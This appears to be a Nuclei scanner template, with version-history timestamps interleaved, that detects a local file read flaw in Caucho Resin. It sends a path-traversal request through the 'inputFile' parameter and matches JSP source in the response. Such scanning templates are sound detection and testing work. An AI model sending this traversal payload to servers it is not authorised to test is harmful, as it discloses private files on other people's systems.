2021-04-22 13:46:56 +00:00
id : resin-inputfile-fileread
info :
name : Caucho Resin LFR
author : princechaddha
severity : high
2021-08-09 13:08:19 +00:00
description : A vulnerability in Caucho Resin allows remote unauthenticated users to utilize the 'inputFile' variable to include the content of locally stored files and disclose their content.
2021-04-22 13:46:56 +00:00
tags : resin,caucho,lfr
2021-08-09 13:10:10 +00:00
reference : https://blkstone.github.io/2017/10/30/resin-attack-vectors/
2021-04-22 13:46:56 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp"
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
2021-06-23 20:58:18 +00:00
- "%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %"
2021-04-22 13:46:56 +00:00
part : body